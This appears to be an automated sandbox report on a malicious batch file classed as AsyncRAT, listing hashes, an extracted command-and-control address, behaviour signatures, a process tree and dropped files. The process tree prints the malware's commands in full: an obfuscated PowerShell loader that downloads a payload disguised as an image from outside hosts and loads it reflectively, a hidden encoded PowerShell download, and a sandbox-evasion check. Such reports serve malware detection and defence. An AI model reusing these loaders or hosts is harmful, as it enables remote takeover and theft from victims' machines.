Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-12-2024 02:36

General

  • Target

    5d3e1ec332b5f64b4fed0d5f4dae21008ae05ec7f754f804f813925c4573e12c.bat

  • Size

    14KB

  • MD5

    b4ca7ff5efd0278fef09daf595489560

  • SHA1

    112847b2bf3d344b10aae9d6bb375de51b0d3b7b

  • SHA256

    5d3e1ec332b5f64b4fed0d5f4dae21008ae05ec7f754f804f813925c4573e12c

  • SHA512

    5e3933d702ecad73bdd81723bd2de7bfb919a10e768a2f1a7e2c90bdb02b6f6ee30a80a9233fe7ca3bc72efb3e7b1f20ff3a6bd05960e172d77bc928418b25b2

  • SSDEEP

    192:SLmONLs0foAt5SVQfFY3vJG5finGma/E0DlNwYaJQnY+1adnG7RQBaFovHSehrvb:/0foNGUvoLwzJQIdnG7R/EHZbGNpM

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

C2

103.125.189.155:8848

Mutex

DcRatMutex_6565

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Drops startup file 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\5d3e1ec332b5f64b4fed0d5f4dae21008ae05ec7f754f804f813925c4573e12c.bat"
    1⤵
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:1324
    • C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get name
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4032
    • C:\Windows\system32\find.exe
      find "QEMU"
      2⤵
        PID:3476
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell "$codigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$HQ$ZQBz$HQ$aQBu$Gc$cwBv$G0$ZQB0$Gg$aQBu$Gc$d$$v$GY$ZwBo$Gg$a$Bo$Gg$a$Bo$Gg$a$Bk$Gc$LwBk$G8$dwBu$Gw$bwBh$GQ$cw$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$/$DU$Mw$3$DY$MQ$y$Cc$L$$g$Cc$a$B0$HQ$c$$6$C8$Lw$x$D$$Mw$u$DI$ZQ$u$DY$Mg$v$HQ$ZQBz$HQ$XwBp$G0$Zw$u$Go$c$Bn$Cc$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$g$D0$I$BE$G8$dwBu$Gw$bwBh$GQ$R$Bh$HQ$YQBG$HI$bwBt$Ew$aQBu$Gs$cw$g$CQ$b$Bp$G4$awBz$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$aQBm$C$$K$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$t$G4$ZQ$g$CQ$bgB1$Gw$b$$p$C$$ew$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$I$$9$C$$WwBT$Hk$cwB0$GU$bQ$u$FQ$ZQB4$HQ$LgBF$G4$YwBv$GQ$aQBu$Gc$XQ$6$Do$VQBU$EY$O$$u$Ec$ZQB0$FM$d$By$Gk$bgBn$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$UwBU$EE$UgBU$D4$Pg$n$Ds$I$$k$GU$bgBk$EY$b$Bh$Gc$I$$9$C$$Jw$8$Dw$QgBB$FM$RQ$2$DQ$XwBF$E4$R$$+$D4$Jw$7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$p$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$Ek$bgBk$GU$e$BP$GY$K$$k$GU$bgBk$EY$b$Bh$Gc$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$LQBn$GU$I$$w$C$$LQBh$G4$Z$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$LQBn$HQ$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$KQ$g$Hs$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$r$D0$I$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$C4$T$Bl$G4$ZwB0$Gg$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GI$YQBz$GU$Ng$0$Ew$ZQBu$Gc$d$Bo$C$$PQ$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$LQ$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YgBh$HM$ZQ$2$DQ$QwBv$G0$bQBh$G4$Z$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$UwB1$GI$cwB0$HI$aQBu$Gc$K$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$L$$g$CQ$YgBh$HM$ZQ$2$DQ$T$Bl$G4$ZwB0$Gg$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YwBv$G0$bQBh$G4$Z$BC$Hk$d$Bl$HM$I$$9$C$$WwBT$Hk$cwB0$GU$bQ$u$EM$bwBu$HY$ZQBy$HQ$XQ$6$Do$RgBy$G8$bQBC$GE$cwBl$DY$N$BT$HQ$cgBp$G4$Zw$o$CQ$YgBh$HM$ZQ$2$DQ$QwBv$G0$bQBh$G4$Z$$p$Ds$I$$k$Gw$bwBh$GQ$ZQBk$EE$cwBz$GU$bQBi$Gw$eQ$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$UgBl$GY$b$Bl$GM$d$Bp$G8$bg$u$EE$cwBz$GU$bQBi$Gw$eQBd$Do$OgBM$G8$YQBk$Cg$J$Bj$G8$bQBt$GE$bgBk$EI$eQB0$GU$cw$p$Ds$I$$k$HQ$eQBw$GU$I$$9$C$$J$Bs$G8$YQBk$GU$Z$BB$HM$cwBl$G0$YgBs$Hk$LgBH$GU$d$BU$Hk$c$Bl$Cg$JwB0$GU$cwB0$H$$bwB3$GU$cgBz$Gg$ZQBs$Gw$LgBI$G8$YQBh$GE$YQBh$GE$cwBk$G0$ZQ$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bt$GU$d$Bo$G8$Z$$g$D0$I$$k$HQ$eQBw$GU$LgBH$GU$d$BN$GU$d$Bo$G8$Z$$o$Cc$b$Bm$HM$ZwBl$GQ$Z$Bk$GQ$Z$Bk$GQ$YQ$n$Ck$LgBJ$G4$dgBv$Gs$ZQ$o$CQ$bgB1$Gw$b$$s$C$$WwBv$GI$agBl$GM$d$Bb$F0$XQ$g$Cg$JwB0$Hg$d$$u$GM$cgBj$GQ$awBl$GU$Lw$y$DY$Lg$y$D$$MQ$u$D$$Mg$u$DM$M$$x$C8$Lw$6$H$$d$B0$Gg$Jw$s$C$$Jw$w$Cc$L$$g$Cc$UwB0$GE$cgB0$HU$c$BO$GE$bQBl$Cc$L$$g$Cc$UgBl$Gc$QQBz$G0$Jw$s$C$$Jw$w$Cc$KQ$p$H0$fQ$=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($codigo.replace('$','A')));powershell.exe $OWjuxD"
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2748
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/testingsomethingt/fghhhhhhhhhdg/downloads/new_img.jpg?537612', 'http://103.2e.62/test_img.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.crcdkee/26.201.02.301//:ptth', '0', 'StartupName', 'RegAsm', '0'))}}"
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:536
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:4988
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        pOWeRshElL.eXE -EX bYPasS -nOp -W hiDdeN -eC IAAgAGkAUgBtACAACQAtAFUAUgBpACAAKAAdIGgAdAB0AHAAOgAvAC8AMQAwADMALgAyADAALgAxADAAMgAuADYAMgAvADQAMAA0AC4AZABvAB0gIAAJACAACQArACAACQAdIGMAeAAdICAACQApACAALQBvAFUAVABGAEkATABFACAACQAdICQARQBOAFYAOgBhAHAAUABkAGEAdABBAFwAZABvAG4AaABhAG4AZwAuAGQAbwBjAHgAHSAgAAkAOwAgAAkAaQBuAHYATwBrAEUALQBpAFQAZQBtACAAHSAkAEUATgB2ADoAYQBwAHAAZABBAHQAQQBcAGQAbwBuAGgAYQBuAGcALgBkAG8AYwB4AB0g
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3696
        • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
          "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\donhang.docx" /o ""
          3⤵
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious behavior: AddClipboardFormatListener
          • Suspicious use of SetWindowsHookEx
          PID:2980

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      f41839a3fe2888c8b3050197bc9a0a05

      SHA1

      0798941aaf7a53a11ea9ed589752890aee069729

      SHA256

      224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

      SHA512

      2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      64B

      MD5

      50a8221b93fbd2628ac460dd408a9fc1

      SHA1

      7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

      SHA256

      46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

      SHA512

      27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

    • C:\Users\Admin\AppData\Local\Temp\TCDFAF5.tmp\iso690.xsl

      Filesize

      263KB

      MD5

      ff0e07eff1333cdf9fc2523d323dd654

      SHA1

      77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

      SHA256

      3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

      SHA512

      b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hnht5o4m.41j.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

      Filesize

      330B

      MD5

      b98a08b5658f4dfe43e365fbc880ec92

      SHA1

      809ca8dba94ed669ede1f46b831648a7adfd6394

      SHA256

      76b48c282ab5fb0c4509db62907d32c6cf3d71690a07b33c807f053bd1c29bf9

      SHA512

      4e7676cbf364add2899ffd30bf21f48f4d3f487eea0454b645dbd40c12d911c548497c27aeef9470a28f08dea5262aaa476e9bc80b819a1034c1f796363f9117

    • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

      Filesize

      16B

      MD5

      d29962abc88624befc0135579ae485ec

      SHA1

      e40a6458296ec6a2427bcb280572d023a9862b31

      SHA256

      a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866

      SHA512

      4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

      Filesize

      2KB

      MD5

      b84f06a1f36e6e62987e6feda4ce3a01

      SHA1

      6c40549120e4941e9405bcf84c75d139d175f23b

      SHA256

      b721506dedcd0a734788e3ac96752e6f6b23df7ae8b2953179bb68a3f4d04ff5

      SHA512

      e2562fd38f8edc0a5a956d47aecfb958f28dc94ed5b6158886c4fd29df008a295aef06f17afde5edf5bc2fe758cfb9506307af29d250dbbc02e15f3aa77335aa

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

      Filesize

      1KB

      MD5

      58505df9ab30d6fa8f0260458fa262b0

      SHA1

      4c923636f055dd057a3140e03bfa90aba499496d

      SHA256

      112a180e118f36eadcff5d03fc00db499f04dfba106b79b70e7b213bc63e97ae

      SHA512

      6699d2f9eb7687cef5fbf138960624d37c649c2357b575c0aee9f2c04b911900a5a5e5930e13d0aaec1f1f348f8040a0dcf0c20f355f03faf3646cf787eacdbf

    • C:\Users\Admin\AppData\Roaming\donhang.docx

      Filesize

      12KB

      MD5

      ff3620557b65e6e8dd8816643d785c5a

      SHA1

      d5021480b7cac2066462829c53dc18615642c579

      SHA256

      85225d3c39423bbfc05e9d52351a9b00670fee3565457e5c3f75caac27ca4de9

      SHA512

      c2a842bfa4f3caf50d58d5707ca0ad978e04e5111fe20ad468282c216567d25da7022fb7ff2681cb72acc8add3cbcf37000b6bde06ad252758f6ff06c9fb3d34

    • memory/536-24-0x00007FFC4F9C0000-0x00007FFC50481000-memory.dmp

      Filesize

      10.8MB

    • memory/536-29-0x00007FFC4F9C0000-0x00007FFC50481000-memory.dmp

      Filesize

      10.8MB

    • memory/536-25-0x000001DE78320000-0x000001DE78330000-memory.dmp

      Filesize

      64KB

    • memory/536-13-0x00007FFC4F9C0000-0x00007FFC50481000-memory.dmp

      Filesize

      10.8MB

    • memory/536-14-0x00007FFC4F9C0000-0x00007FFC50481000-memory.dmp

      Filesize

      10.8MB

    • memory/2748-2-0x000001A776AA0000-0x000001A776AC2000-memory.dmp

      Filesize

      136KB

    • memory/2748-33-0x00007FFC4F9C0000-0x00007FFC50481000-memory.dmp

      Filesize

      10.8MB

    • memory/2748-11-0x00007FFC4F9C0000-0x00007FFC50481000-memory.dmp

      Filesize

      10.8MB

    • memory/2748-12-0x00007FFC4F9C0000-0x00007FFC50481000-memory.dmp

      Filesize

      10.8MB

    • memory/2748-0-0x00007FFC4F9C3000-0x00007FFC4F9C5000-memory.dmp

      Filesize

      8KB

    • memory/2980-57-0x00007FFC2BD00000-0x00007FFC2BD10000-memory.dmp

      Filesize

      64KB

    • memory/2980-56-0x00007FFC2BD00000-0x00007FFC2BD10000-memory.dmp

      Filesize

      64KB

    • memory/2980-54-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

      Filesize

      64KB

    • memory/2980-55-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

      Filesize

      64KB

    • memory/2980-53-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

      Filesize

      64KB

    • memory/2980-52-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

      Filesize

      64KB

    • memory/2980-51-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

      Filesize

      64KB

    • memory/4988-88-0x0000000005AD0000-0x0000000005B6C000-memory.dmp

      Filesize

      624KB

    • memory/4988-89-0x0000000006120000-0x00000000066C4000-memory.dmp

      Filesize

      5.6MB

    • memory/4988-90-0x0000000005BE0000-0x0000000005C46000-memory.dmp

      Filesize

      408KB

    • memory/4988-26-0x0000000000400000-0x0000000000412000-memory.dmp

      Filesize

      72KB